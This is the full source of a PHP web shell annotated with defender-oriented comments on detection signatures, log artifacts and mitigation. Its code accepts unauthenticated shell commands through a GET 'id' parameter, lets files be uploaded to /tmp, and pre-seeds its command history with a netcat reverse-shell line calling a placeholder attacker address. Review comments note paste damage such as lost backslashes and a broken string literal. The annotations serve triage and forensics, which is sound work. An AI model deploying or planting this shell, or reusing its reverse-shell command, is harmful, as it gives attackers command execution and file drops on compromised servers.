<?php
// Single-file PHP web shell: remote command execution, file upload, and a browser console UI.
// Request routing, in order:
//   1. GET with an 'id' query parameter      -> exec() the value as the PHP/web-server user, echo the raw output
//   2. multipart POST carrying a 'file' part -> move_uploaded_file() into $_SERVER['TEMP'] or /tmp, then exit()
//   3. anything else                         -> render the HTML/JS console below (the else-brace closes at end of file)
// There is no authentication, no allow-list and no input validation anywhere in this file.
// Detection / triage notes for defenders:
//   - every command is sent as a GET, so it appears verbatim (escape()-encoded) in the web server
//     access log as  <script path>?id=<command>  — a primary forensic source;
//   - exec() is called on every page load too (the "whoami" banner at the bottom), so a web-server
//     worker spawning a shell is expected even without an 'id' request;
//   - the literals "PHP Shell", "nc yourIPAddress 4444 -e /bin/bash" and "Upload to /tmp" are
//     stable content signatures for the file itself.
// Mitigation: remove the file, review access logs for '?id=' requests and multipart POSTs to this
// path, inspect /tmp (see the upload branch) and rotate anything reachable from the web-server account.
    if(isset($_GET['id']))
    {
        // stripslashes() presumably undoes legacy magic_quotes-style escaping — no other filtering.
        $command = stripslashes($_GET['id']);
        // exec() hands the string to the system shell with stderr merged into stdout; $out receives
        // the output lines. The " 2>&1" suffix is a useful marker in process command-line telemetry.
        exec($command . " 2>&1",$out);
        foreach($out as $o)
            // NOTE(review): "n" is presumably "\n" with the backslash lost in the paste; as pasted,
            // output lines are joined with a literal 'n' rather than a newline.
            echo $o . "n";
    }
        else if(isset($_FILES['file']['tmp_name']))
        {
            $name = basename($_FILES['file']['name']);
            // Precedence note: '.' binds tighter than '?:', so the destination evaluates as
            //   TEMP ? TEMP : ("/tmp" . "/" . basename(...))
            // $_SERVER['TEMP'] is not a standard CGI variable and is usually unset (TODO confirm on the
            // host in question), so the common outcome is /tmp/<original basename>, owned by the
            // web-server user — the place to look for dropped files during forensics.
            if(move_uploaded_file($_FILES['file']['tmp_name'], $_SERVER['TEMP']?$_SERVER['TEMP']:"/tmp" . "/" . basename($_FILES['file']['name'])))
            {
                echo "<textarea style='color:white;'>$name: Success!</textarea>";
            }
            else
            {
                echo "<textarea style='color:white;'>$name: Failure!</textarea>";
            }
            // The upload response is rendered inside the hidden iframe created by fileUploadBox();
            // exit() keeps the console HTML below from being emitted a second time.
            exit();

        }
    else
    {
?>
<html>
<head>
<title>PHP Shell</title>
<style>

* {
  margin: 0;
  padding: 0;
  border: 0;
  overflow-y: hidden;
  background-color:black;
  color: white;
}
html,body{
height: 100%;
}
.wrapper{
   min-height:100%;
   margin 0 auto -2em;
}
.output{
  color: white;
  font-family:"Courier New",monospace;
  font-size:12px;
  width: 100%;
  height: 90%;
}
.input{
  float: left;
  border-bottom:2px inset white;
  border-top:2px inset white;
  color: white;
  background-color: black;
  font-family:"Courier New",monospace;
  font-size:12px;
  width: 80%;
  height: 4%;
}
.info{
  clear: both;
  display: block;
  color:white;
  font-family:"Courier New",monospace;
  font-size:12px;
  width: 100%;
  height: 2em;
  margin-top: -2em;
}
.popup{
  position:absolute;
  left: 0px;
  top: 0px;
  z-index:10;
  border:5px;
  border-style:double;
  border-color:white;
  height:100px;
  width:400px;
  font-family:"Courier New",monospace;
  font-size:12px;

}
.push{
    height: 2em;
}
.form1{
  height:100%;
}
.button{
  border:0px;
  border-left:1px outset white;
  border-top:1px outset white;
  border-bottom:1px outset white;
  color:white;
  background-color: black;
  font-family:"Courier New",monospace;
  font-size:12px;
  text-align: center;
  height: 4%;
  width:10%;
  float:right;
}
p{ color:white; }
</style>

<script type="text/javascript">

// Shared XMLHttpRequest reused for every command round-trip (implicit global: no var/let).
http = new XMLHttpRequest();
// 10-slot ring buffer of previously entered commands, navigated with Up/Down in submitform().
var bash_history = new Array(10);
// Slot 0 is pre-seeded with a netcat reverse-shell template; this literal is a reliable
// content signature for the file.
bash_history[0] = "nc yourIPAddress 4444 -e /bin/bash"
var history_newest = 0;   // index of the most recently stored command
var history_oldest = 0;   // index of the oldest command still in the ring
var history_place = -1;   // cursor while browsing history; -1 = not browsing (fresh input line)
// Keydown handler wired to <body onKeyDown>. `myfield` is unused; `e` is the event.
// Enter (13) submits the input line, Up (38) / Down (40) walk the history ring; any other key
// returns true so the browser handles it normally.
function submitform(myfield, e)
{
  var key;
  // Legacy IE exposes the event on window.event; other browsers pass it as the argument.
  if(window.event)
    {
      key = window.event.keyCode;
    }
  else if(e) key = e.which;
  else return true;

    if(key == 13)
    {
        // Enter: send the command and clear the input box; returning false suppresses the newline.
        updateData(document.form1.input.value);
        document.form1.input.value="";
        return false;
    }
    else if(key == 38) // Up Arrow
    {
        if(history_place != history_oldest)
        {
            //go up in history
            if(history_place == -1)
            {
                // Not browsing yet: start from the newest entry.
                history_place = history_newest;
            }
            else
            {
                history_place--;
                if(history_place == -1)
                {
                    // Wrap around the 10-slot ring.
                    history_place += 10;
                }
            }
            document.form1.input.value = bash_history[history_place];
        }
        else
        {
            // Already at the oldest entry: stay there.
            document.form1.input.value = bash_history[history_oldest];
        }

        return false;
    }
    else if(key == 40) // Down Arrow
    {
        // Not browsing, nothing stored yet (initial state), or already at the newest entry:
        // drop back to an empty input line.
        if(history_place == -1 || history_newest == history_oldest || history_place == history_newest)
        {
            history_place = -1;
            document.form1.input.value = "";
        }
        else
        {
            history_place = (history_place + 1)%10;
            document.form1.input.value = bash_history[history_place];
        }
        return false;
    }
    else
    {
        return true;
    }
}

// Record `param` in the history ring and send it to the server as GET ?id=<command>.
// "clear" is handled client-side only (wipes the output pane) and never reaches the server,
// so it will not show up in access logs.
function updateData(param)
{
    if(param == "")
    {
        return;
    }
    //manage bash_history

    // Advance the newest slot, wrapping at 10; if it collides with the oldest slot, the
    // oldest entry is evicted by advancing that pointer as well.
    history_newest = history_newest + 1;
    if(history_newest == 10)
    {
        history_newest = 0;
    }
    if(history_newest == history_oldest)
    {
        history_oldest = history_oldest + 1;
        if(history_oldest == 10)
        {
            history_oldest = 0;
        }
    }
    bash_history[history_newest] = param;
    history_place = -1;   // leave browsing mode after a new command

    if(param == "clear")
    {
        document.form1.output.value = "";
        return;
    }

    // Echo the command into the output pane before the response arrives.
    // NOTE(review): "n" is presumably "\n" with the backslash lost in the paste.
    document.form1.output.value+= "$: " + param + "n";
    document.form1.output.scrollTop = document.form1.output.scrollHeight;
    // The server reflects REQUEST_URI straight into this JS string literal; the surrounding
    // `"""` presumably read `"\""` before the paste dropped backslashes.
    var myurl = <?php echo """ . $_SERVER['REQUEST_URI']. """; ?>

    // Async GET back to this same script. Because it is a GET, the full command is part of the
    // URL and is recorded in the web server access log — the main detection/forensic artifact.
    http.open("GET", myurl + "?id=" + escape(param), true);
    http.onreadystatechange = useHttpResponse;
    http.send(null);

}

// XHR completion callback: append the raw exec() output returned by the server to the
// output pane and keep it scrolled to the bottom.
function useHttpResponse() {
  if (http.readyState == 4) {
    var textout = http.responseText;
    document.form1.output.value+=textout;
    document.form1.output.scrollTop = document.form1.output.scrollHeight;
  }
}

// Injects a floating upload form. It POSTs a multipart 'file' part back to this same script
// (the hidden iframe is the form target so the console page itself does not navigate), which
// hits the move_uploaded_file() branch at the top of the file. The submit button's label
// reveals the server-side destination directory (TEMP or /tmp).
// NOTE(review): the innerHTML string below is split across three lines here; as pasted this
// would be an unterminated string literal, so the original presumably kept it on one line.
function fileUploadBox() {
  var uploadDiv = document.createElement("div");
  uploadDiv.setAttribute("align","center");
  uploadDiv.id="upload_box";
  uploadDiv.className = "popup";
  uploadDiv.innerHTML="<form id='file_upload' method='post' enctype='multipart/form-data' target='uploader'><input name='file' id='file' type='file' />
<input type='submit' name='action' value='Upload to <?php echo htmlentities($_SERVER['TEMP']?$_SERVER['TEMP']:"/tmp"); ?>' style='border:1px solid white;'/>
<iframe name='uploader' id='uploader' src='<?php echo "./" . $_SERVER['REQUEST_URI'];?>' width='0' height='0' style='display:none;'></iframe></form><button name='close_button' class='button' type='button' style='height:3em;width:30%;' onclick='var element = document.getElementById("upload_box"); element.parentNode.removeChild(element);' readonly=true>Close!</button>";
  document.body.appendChild(uploadDiv);

}
</script>

</head>
<body onLoad="document.form1.input.focus(); document.form1.output.scrollTop = document.form1.output.scrollHeight" onKeyDown="return submitform(this, event)">

<div class="wrapper">
<form name="form1">
<textarea name="output" class="output" readonly=true></textarea>
<script>document.form1.output.value="";document.title="PHP Shell: " + window.location.hostname;</script>
<textarea name="input" class="input"></textarea>
<button name="upload_button" class="button" type="button" readonly=true onclick="fileUploadBox();">Upload!</button>
<button name="submit_button" class="button" type="button" readonly=true onclick="updateData(document.form1.input.value); document.form1.input.value=''">Execute!</button>
</form>

<div class="push"></div>

</div>

<textarea name="info" class="info" readonly=true>
<?php
// Status bar rendered on every page load: a second exec() ("whoami") — so merely viewing the
// console spawns a shell process under the web-server user — plus DOCUMENT_ROOT and an
// OS / server-software / PHP-version banner.
// NOTE(review): "$who[0]tlocation" and "$pwdtsystem" presumably contained "\t" before the paste;
// as pasted, "$pwdtsystem" would be parsed as a single (undefined) variable name.
exec("whoami",$who);
$pwd=$_SERVER["DOCUMENT_ROOT"];
$sys=PHP_OS . ", " .$_SERVER['SERVER_SOFTWARE']. ", " . phpversion();
echo "user: $who[0]tlocation: $pwdtsystem: $sys";
?>
</textarea>
</body>
</html>
<?php
    } // closes the "render console" else-branch opened at the top of the file
?>